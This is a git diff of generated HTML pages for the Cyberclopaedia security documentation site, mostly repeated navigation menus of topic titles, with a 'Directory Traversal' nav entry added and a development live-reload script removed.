      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -279,22 +279,6 @@

- const wsProtocol = location.protocol === 'https:' ? 'wss:' : 'ws:'; - const wsAddress = wsProtocol + "//" + location.host + "/" + "__livereload"; - const socket = new WebSocket(wsAddress); - socket.onmessage = function (event) { - if (event.data === "reload") { - socket.close(); - location.reload(); - } - }; - - window.onbeforeunload = function() { - socket.close(); - } - diff --git a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Hash-Based MACs (HMAC).html b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Hash-Based MACs (HMAC).html index 1864a513..52fd48e0 100644 --- a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Hash-Based MACs (HMAC).html +++ b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/Hash-Based MACs (HMAC).html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -204,22 +204,6 @@

Security of - - diff --git a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html index a51b854f..7358fde5 100644 --- a/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html +++ b/docs/Cryptography/Private-Key Cryptography/Message Authentication Codes (MACs)/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
